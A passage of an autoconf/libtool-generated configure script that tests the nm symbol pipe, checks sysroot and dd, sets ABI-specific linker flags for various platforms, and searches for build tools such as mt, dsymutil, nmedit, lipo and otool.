\"I\",si,substr(si,length(prfx))};"\ " \$ 0!~/External *\|/{next};"\ " / 0+ UNDEF /{next}; / UNDEF \([^|]\)*()/{next};"\ " {if(hide[section]) next};"\ " {f=\"D\"}; \$ 0~/\(\).*\|/{f=\"T\"};"\ " {split(\$ 0,a,/\||\r/); split(a[2],s)};"\ " s[1]~/^[@?]/{print f,s[1],s[1]; next};"\ " s[1]~prfx {split(s[1],t,\"@\"); print f,t[1],substr(t[1],length(prfx))}"\ " ' prfx=^$ac_symprfx" else lt_cv_sys_global_symbol_pipe="sed -n -e 's/^.*[ ]\($symcode$symcode*\)[ ][ ]*$ac_symprfx$sympat$opt_cr$/$symxfrm/p'" fi lt_cv_sys_global_symbol_pipe="$lt_cv_sys_global_symbol_pipe | sed '/ __gnu_lto/d'" # Check to see that the pipe works correctly. pipe_works=no rm -f conftest* cat > conftest.$ac_ext <<_LT_EOF #ifdef __cplusplus extern "C" { #endif char nm_test_var; void nm_test_func(void); void nm_test_func(void){} #ifdef __cplusplus } #endif int main(){nm_test_var='a';nm_test_func();return(0);} _LT_EOF if { { eval echo "\"\$as_me\":${as_lineno-$LINENO}: \"$ac_compile\""; } >&5 (eval $ac_compile) 2>&5 ac_status=$? $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 test $ac_status = 0; }; then # Now try to grab the symbols. nlist=conftest.nm if { { eval echo "\"\$as_me\":${as_lineno-$LINENO}: \"$NM conftest.$ac_objext \| "$lt_cv_sys_global_symbol_pipe" \> $nlist\""; } >&5 (eval $NM conftest.$ac_objext \| "$lt_cv_sys_global_symbol_pipe" \> $nlist) 2>&5 ac_status=$? $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 test $ac_status = 0; } && test -s "$nlist"; then # Try sorting and uniquifying the output. if sort "$nlist" | uniq > "$nlist"T; then mv -f "$nlist"T "$nlist" else rm -f "$nlist"T fi # Make sure that we snagged all the symbols we need. if $GREP ' nm_test_var$' "$nlist" >/dev/null; then if $GREP ' nm_test_func$' "$nlist" >/dev/null; then cat <<_LT_EOF > conftest.$ac_ext /* Keep this code in sync between libtool.m4, ltmain, lt_system.h, and tests. */ #if defined _WIN32 || defined __CYGWIN__ || defined _WIN32_WCE /* DATA imports from DLLs on WIN32 can't be const, because runtime relocations are performed -- see ld's documentation on pseudo-relocs. */ # define LT_DLSYM_CONST #elif defined __osf__ /* This system does not cope well with relocations in const data. */ # define LT_DLSYM_CONST #else # define LT_DLSYM_CONST const #endif #ifdef __cplusplus extern "C" { #endif _LT_EOF # Now generate the symbol file. eval "$lt_cv_sys_global_symbol_to_cdecl"' < "$nlist" | $GREP -v main >> conftest.$ac_ext' cat <<_LT_EOF >> conftest.$ac_ext /* The mapping between symbol names and symbols. */ LT_DLSYM_CONST struct { const char *name; void *address; } lt__PROGRAM__LTX_preloaded_symbols[] = { { "@PROGRAM@", (void *) 0 }, _LT_EOF $SED "s/^$symcode$symcode* .* \(.*\)$/ {\"\1\", (void *) \&\1},/" < "$nlist" | $GREP -v main >> conftest.$ac_ext cat <<\_LT_EOF >> conftest.$ac_ext {0, (void *) 0} }; /* This works around a problem in FreeBSD linker */ #ifdef FREEBSD_WORKAROUND static const void *lt_preloaded_setup() { return lt__PROGRAM__LTX_preloaded_symbols; } #endif #ifdef __cplusplus } #endif _LT_EOF # Now try linking the two files. mv conftest.$ac_objext conftstm.$ac_objext lt_globsym_save_LIBS=$LIBS lt_globsym_save_CFLAGS=$CFLAGS LIBS=conftstm.$ac_objext CFLAGS="$CFLAGS$lt_prog_compiler_no_builtin_flag" if { { eval echo "\"\$as_me\":${as_lineno-$LINENO}: \"$ac_link\""; } >&5 (eval $ac_link) 2>&5 ac_status=$? $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 test $ac_status = 0; } && test -s conftest$ac_exeext; then pipe_works=yes fi LIBS=$lt_globsym_save_LIBS CFLAGS=$lt_globsym_save_CFLAGS else echo "cannot find nm_test_func in $nlist" >&5 fi else echo "cannot find nm_test_var in $nlist" >&5 fi else echo "cannot run $lt_cv_sys_global_symbol_pipe" >&5 fi else echo "$progname: failed program was:" >&5 cat conftest.$ac_ext >&5 fi rm -rf conftest* conftst* # Do not use the global_symbol_pipe unless it works. if test yes = "$pipe_works"; then break else lt_cv_sys_global_symbol_pipe= fi done fi if test -z "$lt_cv_sys_global_symbol_pipe"; then lt_cv_sys_global_symbol_to_cdecl= fi if test -z "$lt_cv_sys_global_symbol_pipe$lt_cv_sys_global_symbol_to_cdecl"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: failed" >&5 $as_echo "failed" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: ok" >&5 $as_echo "ok" >&6; } fi # Response file support. if test "$lt_cv_nm_interface" = "MS dumpbin"; then nm_file_list_spec='@' elif $NM --help 2>/dev/null | grep '[@]FILE' >/dev/null; then nm_file_list_spec='@' fi { $as_echo "$as_me:${as_lineno-$LINENO}: checking for sysroot" >&5 $as_echo_n "checking for sysroot... " >&6; } # Check whether --with-sysroot was given. if test "${with_sysroot+set}" = set; then : withval=$with_sysroot; else with_sysroot=no fi lt_sysroot= case $with_sysroot in #( yes) if test yes = "$GCC"; then lt_sysroot=`$CC --print-sysroot 2>/dev/null` fi ;; #( /*) lt_sysroot=`echo "$with_sysroot" | sed -e "$sed_quote_subst"` ;; #( no|'') ;; #( *) { $as_echo "$as_me:${as_lineno-$LINENO}: result: $with_sysroot" >&5 $as_echo "$with_sysroot" >&6; } as_fn_error $? "The sysroot must be an absolute path." "$LINENO" 5 ;; esac { $as_echo "$as_me:${as_lineno-$LINENO}: result: ${lt_sysroot:-no}" >&5 $as_echo "${lt_sysroot:-no}" >&6; } { $as_echo "$as_me:${as_lineno-$LINENO}: checking for a working dd" >&5 $as_echo_n "checking for a working dd... " >&6; } if ${ac_cv_path_lt_DD+:} false; then : $as_echo_n "(cached) " >&6 else printf 0123456789abcdef0123456789abcdef >conftest.i cat conftest.i conftest.i >conftest2.i : ${lt_DD:=$DD} if test -z "$lt_DD"; then ac_path_lt_DD_found=false # Loop through the user's path and test for each of PROGNAME-LIST as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_prog in dd; do for ac_exec_ext in '' $ac_executable_extensions; do ac_path_lt_DD="$as_dir/$ac_prog$ac_exec_ext" as_fn_executable_p "$ac_path_lt_DD" || continue if "$ac_path_lt_DD" bs=32 count=1 conftest.out 2>/dev/null; then cmp -s conftest.i conftest.out \ && ac_cv_path_lt_DD="$ac_path_lt_DD" ac_path_lt_DD_found=: fi $ac_path_lt_DD_found && break 3 done done done IFS=$as_save_IFS if test -z "$ac_cv_path_lt_DD"; then : fi else ac_cv_path_lt_DD=$lt_DD fi rm -f conftest.i conftest2.i conftest.out fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_cv_path_lt_DD" >&5 $as_echo "$ac_cv_path_lt_DD" >&6; } { $as_echo "$as_me:${as_lineno-$LINENO}: checking how to truncate binary pipes" >&5 $as_echo_n "checking how to truncate binary pipes... " >&6; } if ${lt_cv_truncate_bin+:} false; then : $as_echo_n "(cached) " >&6 else printf 0123456789abcdef0123456789abcdef >conftest.i cat conftest.i conftest.i >conftest2.i lt_cv_truncate_bin= if "$ac_cv_path_lt_DD" bs=32 count=1 conftest.out 2>/dev/null; then cmp -s conftest.i conftest.out \ && lt_cv_truncate_bin="$ac_cv_path_lt_DD bs=4096 count=1" fi rm -f conftest.i conftest2.i conftest.out test -z "$lt_cv_truncate_bin" && lt_cv_truncate_bin="$SED -e 4q" fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: $lt_cv_truncate_bin" >&5 $as_echo "$lt_cv_truncate_bin" >&6; } # Calculate cc_basename. Skip known compiler wrappers and cross-prefix. func_cc_basename () { for cc_temp in $*""; do case $cc_temp in compile | *[\\/]compile | ccache | *[\\/]ccache ) ;; distcc | *[\\/]distcc | purify | *[\\/]purify ) ;; \-*) ;; *) break;; esac done func_cc_basename_result=`$ECHO "$cc_temp" | $SED "s%.*/%%; s%^$host_alias-%%"` } # Check whether --enable-libtool-lock was given. if test "${enable_libtool_lock+set}" = set; then : enableval=$enable_libtool_lock; fi test no = "$enable_libtool_lock" || enable_libtool_lock=yes # Some flags need to be propagated to the compiler or linker for good # libtool support. case $host in ia64-*-hpux*) # Find out what ABI is being produced by ac_compile, and set mode # options accordingly. echo 'int i;' > conftest.$ac_ext if { { eval echo "\"\$as_me\":${as_lineno-$LINENO}: \"$ac_compile\""; } >&5 (eval $ac_compile) 2>&5 ac_status=$? $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 test $ac_status = 0; }; then case `/usr/bin/file conftest.$ac_objext` in *ELF-32*) HPUX_IA64_MODE=32 ;; *ELF-64*) HPUX_IA64_MODE=64 ;; esac fi rm -rf conftest* ;; *-*-irix6*) # Find out what ABI is being produced by ac_compile, and set linker # options accordingly. echo '#line '$LINENO' "configure"' > conftest.$ac_ext if { { eval echo "\"\$as_me\":${as_lineno-$LINENO}: \"$ac_compile\""; } >&5 (eval $ac_compile) 2>&5 ac_status=$? $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 test $ac_status = 0; }; then if test yes = "$lt_cv_prog_gnu_ld"; then case `/usr/bin/file conftest.$ac_objext` in *32-bit*) LD="${LD-ld} -melf32bsmip" ;; *N32*) LD="${LD-ld} -melf32bmipn32" ;; *64-bit*) LD="${LD-ld} -melf64bmip" ;; esac else case `/usr/bin/file conftest.$ac_objext` in *32-bit*) LD="${LD-ld} -32" ;; *N32*) LD="${LD-ld} -n32" ;; *64-bit*) LD="${LD-ld} -64" ;; esac fi fi rm -rf conftest* ;; mips64*-*linux*) # Find out what ABI is being produced by ac_compile, and set linker # options accordingly. echo '#line '$LINENO' "configure"' > conftest.$ac_ext if { { eval echo "\"\$as_me\":${as_lineno-$LINENO}: \"$ac_compile\""; } >&5 (eval $ac_compile) 2>&5 ac_status=$? $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 test $ac_status = 0; }; then emul=elf case `/usr/bin/file conftest.$ac_objext` in *32-bit*) emul="${emul}32" ;; *64-bit*) emul="${emul}64" ;; esac case `/usr/bin/file conftest.$ac_objext` in *MSB*) emul="${emul}btsmip" ;; *LSB*) emul="${emul}ltsmip" ;; esac case `/usr/bin/file conftest.$ac_objext` in *N32*) emul="${emul}n32" ;; esac LD="${LD-ld} -m $emul" fi rm -rf conftest* ;; x86_64-*kfreebsd*-gnu|x86_64-*linux*|powerpc*-*linux*| \ s390*-*linux*|s390*-*tpf*|sparc*-*linux*) # Find out what ABI is being produced by ac_compile, and set linker # options accordingly. Note that the listed cases only cover the # situations where additional linker options are needed (such as when # doing 32-bit compilation for a host where ld defaults to 64-bit, or # vice versa); the common cases where no linker options are needed do # not appear in the list. echo 'int i;' > conftest.$ac_ext if { { eval echo "\"\$as_me\":${as_lineno-$LINENO}: \"$ac_compile\""; } >&5 (eval $ac_compile) 2>&5 ac_status=$? $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 test $ac_status = 0; }; then case `/usr/bin/file conftest.o` in *32-bit*) case $host in x86_64-*kfreebsd*-gnu) LD="${LD-ld} -m elf_i386_fbsd" ;; x86_64-*linux*) case `/usr/bin/file conftest.o` in *x86-64*) LD="${LD-ld} -m elf32_x86_64" ;; *) LD="${LD-ld} -m elf_i386" ;; esac ;; powerpc64le-*linux*) LD="${LD-ld} -m elf32lppclinux" ;; powerpc64-*linux*) LD="${LD-ld} -m elf32ppclinux" ;; s390x-*linux*) LD="${LD-ld} -m elf_s390" ;; sparc64-*linux*) LD="${LD-ld} -m elf32_sparc" ;; esac ;; *64-bit*) case $host in x86_64-*kfreebsd*-gnu) LD="${LD-ld} -m elf_x86_64_fbsd" ;; x86_64-*linux*) LD="${LD-ld} -m elf_x86_64" ;; powerpcle-*linux*) LD="${LD-ld} -m elf64lppc" ;; powerpc-*linux*) LD="${LD-ld} -m elf64ppc" ;; s390*-*linux*|s390*-*tpf*) LD="${LD-ld} -m elf64_s390" ;; sparc*-*linux*) LD="${LD-ld} -m elf64_sparc" ;; esac ;; esac fi rm -rf conftest* ;; *-*-sco3.2v5*) # On SCO OpenServer 5, we need -belf to get full-featured binaries. SAVE_CFLAGS=$CFLAGS CFLAGS="$CFLAGS -belf" { $as_echo "$as_me:${as_lineno-$LINENO}: checking whether the C compiler needs -belf" >&5 $as_echo_n "checking whether the C compiler needs -belf... " >&6; } if ${lt_cv_cc_needs_belf+:} false; then : $as_echo_n "(cached) " >&6 else ac_ext=c ac_cpp='$CPP $CPPFLAGS' ac_compile='$CC -c $CFLAGS $CPPFLAGS conftest.$ac_ext >&5' ac_link='$CC -o conftest$ac_exeext $CFLAGS $CPPFLAGS $LDFLAGS conftest.$ac_ext $LIBS >&5' ac_compiler_gnu=$ac_cv_c_compiler_gnu cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ int main () { ; return 0; } _ACEOF if ac_fn_c_try_link "$LINENO"; then : lt_cv_cc_needs_belf=yes else lt_cv_cc_needs_belf=no fi rm -f core conftest.err conftest.$ac_objext \ conftest$ac_exeext conftest.$ac_ext ac_ext=c ac_cpp='$CPP $CPPFLAGS' ac_compile='$CC -c $CFLAGS $CPPFLAGS conftest.$ac_ext >&5' ac_link='$CC -o conftest$ac_exeext $CFLAGS $CPPFLAGS $LDFLAGS conftest.$ac_ext $LIBS >&5' ac_compiler_gnu=$ac_cv_c_compiler_gnu fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: $lt_cv_cc_needs_belf" >&5 $as_echo "$lt_cv_cc_needs_belf" >&6; } if test yes != "$lt_cv_cc_needs_belf"; then # this is probably gcc 2.8.0, egcs 1.0 or newer; no need for -belf CFLAGS=$SAVE_CFLAGS fi ;; *-*solaris*) # Find out what ABI is being produced by ac_compile, and set linker # options accordingly. echo 'int i;' > conftest.$ac_ext if { { eval echo "\"\$as_me\":${as_lineno-$LINENO}: \"$ac_compile\""; } >&5 (eval $ac_compile) 2>&5 ac_status=$? $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 test $ac_status = 0; }; then case `/usr/bin/file conftest.o` in *64-bit*) case $lt_cv_prog_gnu_ld in yes*) case $host in i?86-*-solaris*|x86_64-*-solaris*) LD="${LD-ld} -m elf_x86_64" ;; sparc*-*-solaris*) LD="${LD-ld} -m elf64_sparc" ;; esac # GNU ld 2.21 introduced _sol2 emulations. Use them if available. if ${LD-ld} -V | grep _sol2 >/dev/null 2>&1; then LD=${LD-ld}_sol2 fi ;; *) if ${LD-ld} -64 -r -o conftest2.o conftest.o >/dev/null 2>&1; then LD="${LD-ld} -64" fi ;; esac ;; esac fi rm -rf conftest* ;; esac need_locks=$enable_libtool_lock if test -n "$ac_tool_prefix"; then # Extract the first word of "${ac_tool_prefix}mt", so it can be a program name with args. set dummy ${ac_tool_prefix}mt; ac_word=$2 { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 $as_echo_n "checking for $ac_word... " >&6; } if ${ac_cv_prog_MANIFEST_TOOL+:} false; then : $as_echo_n "(cached) " >&6 else if test -n "$MANIFEST_TOOL"; then ac_cv_prog_MANIFEST_TOOL="$MANIFEST_TOOL" # Let the user override the test. else as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir/$ac_word$ac_exec_ext"; then ac_cv_prog_MANIFEST_TOOL="${ac_tool_prefix}mt" $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS fi fi MANIFEST_TOOL=$ac_cv_prog_MANIFEST_TOOL if test -n "$MANIFEST_TOOL"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $MANIFEST_TOOL" >&5 $as_echo "$MANIFEST_TOOL" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi fi if test -z "$ac_cv_prog_MANIFEST_TOOL"; then ac_ct_MANIFEST_TOOL=$MANIFEST_TOOL # Extract the first word of "mt", so it can be a program name with args. set dummy mt; ac_word=$2 { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 $as_echo_n "checking for $ac_word... " >&6; } if ${ac_cv_prog_ac_ct_MANIFEST_TOOL+:} false; then : $as_echo_n "(cached) " >&6 else if test -n "$ac_ct_MANIFEST_TOOL"; then ac_cv_prog_ac_ct_MANIFEST_TOOL="$ac_ct_MANIFEST_TOOL" # Let the user override the test. else as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir/$ac_word$ac_exec_ext"; then ac_cv_prog_ac_ct_MANIFEST_TOOL="mt" $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS fi fi ac_ct_MANIFEST_TOOL=$ac_cv_prog_ac_ct_MANIFEST_TOOL if test -n "$ac_ct_MANIFEST_TOOL"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_ct_MANIFEST_TOOL" >&5 $as_echo "$ac_ct_MANIFEST_TOOL" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi if test "x$ac_ct_MANIFEST_TOOL" = x; then MANIFEST_TOOL=":" else case $cross_compiling:$ac_tool_warned in yes:) { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: using cross tools not prefixed with host triplet" >&5 $as_echo "$as_me: WARNING: using cross tools not prefixed with host triplet" >&2;} ac_tool_warned=yes ;; esac MANIFEST_TOOL=$ac_ct_MANIFEST_TOOL fi else MANIFEST_TOOL="$ac_cv_prog_MANIFEST_TOOL" fi test -z "$MANIFEST_TOOL" && MANIFEST_TOOL=mt { $as_echo "$as_me:${as_lineno-$LINENO}: checking if $MANIFEST_TOOL is a manifest tool" >&5 $as_echo_n "checking if $MANIFEST_TOOL is a manifest tool... " >&6; } if ${lt_cv_path_mainfest_tool+:} false; then : $as_echo_n "(cached) " >&6 else lt_cv_path_mainfest_tool=no echo "$as_me:$LINENO: $MANIFEST_TOOL '-?'" >&5 $MANIFEST_TOOL '-?' 2>conftest.err > conftest.out cat conftest.err >&5 if $GREP 'Manifest Tool' conftest.out > /dev/null; then lt_cv_path_mainfest_tool=yes fi rm -f conftest* fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: $lt_cv_path_mainfest_tool" >&5 $as_echo "$lt_cv_path_mainfest_tool" >&6; } if test yes != "$lt_cv_path_mainfest_tool"; then MANIFEST_TOOL=: fi case $host_os in rhapsody* | darwin*) if test -n "$ac_tool_prefix"; then # Extract the first word of "${ac_tool_prefix}dsymutil", so it can be a program name with args. set dummy ${ac_tool_prefix}dsymutil; ac_word=$2 { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 $as_echo_n "checking for $ac_word... " >&6; } if ${ac_cv_prog_DSYMUTIL+:} false; then : $as_echo_n "(cached) " >&6 else if test -n "$DSYMUTIL"; then ac_cv_prog_DSYMUTIL="$DSYMUTIL" # Let the user override the test. else as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir/$ac_word$ac_exec_ext"; then ac_cv_prog_DSYMUTIL="${ac_tool_prefix}dsymutil" $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS fi fi DSYMUTIL=$ac_cv_prog_DSYMUTIL if test -n "$DSYMUTIL"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $DSYMUTIL" >&5 $as_echo "$DSYMUTIL" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi fi if test -z "$ac_cv_prog_DSYMUTIL"; then ac_ct_DSYMUTIL=$DSYMUTIL # Extract the first word of "dsymutil", so it can be a program name with args. set dummy dsymutil; ac_word=$2 { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 $as_echo_n "checking for $ac_word... " >&6; } if ${ac_cv_prog_ac_ct_DSYMUTIL+:} false; then : $as_echo_n "(cached) " >&6 else if test -n "$ac_ct_DSYMUTIL"; then ac_cv_prog_ac_ct_DSYMUTIL="$ac_ct_DSYMUTIL" # Let the user override the test. else as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir/$ac_word$ac_exec_ext"; then ac_cv_prog_ac_ct_DSYMUTIL="dsymutil" $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS fi fi ac_ct_DSYMUTIL=$ac_cv_prog_ac_ct_DSYMUTIL if test -n "$ac_ct_DSYMUTIL"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_ct_DSYMUTIL" >&5 $as_echo "$ac_ct_DSYMUTIL" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi if test "x$ac_ct_DSYMUTIL" = x; then DSYMUTIL=":" else case $cross_compiling:$ac_tool_warned in yes:) { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: using cross tools not prefixed with host triplet" >&5 $as_echo "$as_me: WARNING: using cross tools not prefixed with host triplet" >&2;} ac_tool_warned=yes ;; esac DSYMUTIL=$ac_ct_DSYMUTIL fi else DSYMUTIL="$ac_cv_prog_DSYMUTIL" fi if test -n "$ac_tool_prefix"; then # Extract the first word of "${ac_tool_prefix}nmedit", so it can be a program name with args. set dummy ${ac_tool_prefix}nmedit; ac_word=$2 { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 $as_echo_n "checking for $ac_word... " >&6; } if ${ac_cv_prog_NMEDIT+:} false; then : $as_echo_n "(cached) " >&6 else if test -n "$NMEDIT"; then ac_cv_prog_NMEDIT="$NMEDIT" # Let the user override the test. else as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir/$ac_word$ac_exec_ext"; then ac_cv_prog_NMEDIT="${ac_tool_prefix}nmedit" $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS fi fi NMEDIT=$ac_cv_prog_NMEDIT if test -n "$NMEDIT"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $NMEDIT" >&5 $as_echo "$NMEDIT" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi fi if test -z "$ac_cv_prog_NMEDIT"; then ac_ct_NMEDIT=$NMEDIT # Extract the first word of "nmedit", so it can be a program name with args. set dummy nmedit; ac_word=$2 { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 $as_echo_n "checking for $ac_word... " >&6; } if ${ac_cv_prog_ac_ct_NMEDIT+:} false; then : $as_echo_n "(cached) " >&6 else if test -n "$ac_ct_NMEDIT"; then ac_cv_prog_ac_ct_NMEDIT="$ac_ct_NMEDIT" # Let the user override the test. else as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir/$ac_word$ac_exec_ext"; then ac_cv_prog_ac_ct_NMEDIT="nmedit" $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS fi fi ac_ct_NMEDIT=$ac_cv_prog_ac_ct_NMEDIT if test -n "$ac_ct_NMEDIT"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_ct_NMEDIT" >&5 $as_echo "$ac_ct_NMEDIT" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi if test "x$ac_ct_NMEDIT" = x; then NMEDIT=":" else case $cross_compiling:$ac_tool_warned in yes:) { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: using cross tools not prefixed with host triplet" >&5 $as_echo "$as_me: WARNING: using cross tools not prefixed with host triplet" >&2;} ac_tool_warned=yes ;; esac NMEDIT=$ac_ct_NMEDIT fi else NMEDIT="$ac_cv_prog_NMEDIT" fi if test -n "$ac_tool_prefix"; then # Extract the first word of "${ac_tool_prefix}lipo", so it can be a program name with args. set dummy ${ac_tool_prefix}lipo; ac_word=$2 { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 $as_echo_n "checking for $ac_word... " >&6; } if ${ac_cv_prog_LIPO+:} false; then : $as_echo_n "(cached) " >&6 else if test -n "$LIPO"; then ac_cv_prog_LIPO="$LIPO" # Let the user override the test. else as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir/$ac_word$ac_exec_ext"; then ac_cv_prog_LIPO="${ac_tool_prefix}lipo" $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS fi fi LIPO=$ac_cv_prog_LIPO if test -n "$LIPO"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $LIPO" >&5 $as_echo "$LIPO" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi fi if test -z "$ac_cv_prog_LIPO"; then ac_ct_LIPO=$LIPO # Extract the first word of "lipo", so it can be a program name with args. set dummy lipo; ac_word=$2 { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 $as_echo_n "checking for $ac_word... " >&6; } if ${ac_cv_prog_ac_ct_LIPO+:} false; then : $as_echo_n "(cached) " >&6 else if test -n "$ac_ct_LIPO"; then ac_cv_prog_ac_ct_LIPO="$ac_ct_LIPO" # Let the user override the test. else as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir/$ac_word$ac_exec_ext"; then ac_cv_prog_ac_ct_LIPO="lipo" $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS fi fi ac_ct_LIPO=$ac_cv_prog_ac_ct_LIPO if test -n "$ac_ct_LIPO"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_ct_LIPO" >&5 $as_echo "$ac_ct_LIPO" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi if test "x$ac_ct_LIPO" = x; then LIPO=":" else case $cross_compiling:$ac_tool_warned in yes:) { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: using cross tools not prefixed with host triplet" >&5 $as_echo "$as_me: WARNING: using cross tools not prefixed with host triplet" >&2;} ac_tool_warned=yes ;; esac LIPO=$ac_ct_LIPO fi else LIPO="$ac_cv_prog_LIPO" fi if test -n "$ac_tool_prefix"; then # Extract the first word of "${ac_tool_prefix}otool", so it can be a program name with args. set dummy ${ac_tool_prefix}otool; ac_word=$2 { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 $as_echo_n "checking for $ac_word... " >&6; } if ${ac_cv_prog_OTOOL+:} false; then : $as_echo_n "(cached) " >&6 else if test -n "$OTOOL"; then ac_cv_prog_OTOOL="$OTOOL" # Let the user override the test. else as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir/$ac_word$ac_exec_ext"; then ac_cv_prog_OTOOL="${ac_tool_prefix}otool" $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS fi fi OTOOL=$ac_cv_prog_OTOOL if test -n "$OTOOL"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $OTOOL" >&5 $as_echo "$OTOOL" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi fi if test -z "$ac_cv_prog_OTOOL"; then ac_ct_OTOOL=$OTOOL # Extract the first word of "otool", so it can be a program name with args. set dummy otool; ac_word=$2 { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 $as_echo_n "checking for $ac_word... " >&6; } if ${ac_cv_prog_ac_ct_OTOOL+:} false; then : $as_echo_n "(cached) " >&6 else if test -n "$ac_ct_OTOOL"; then ac_cv_prog_ac_ct_OTOOL="$ac_ct_OTOOL" # Let the user override the test. else as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH 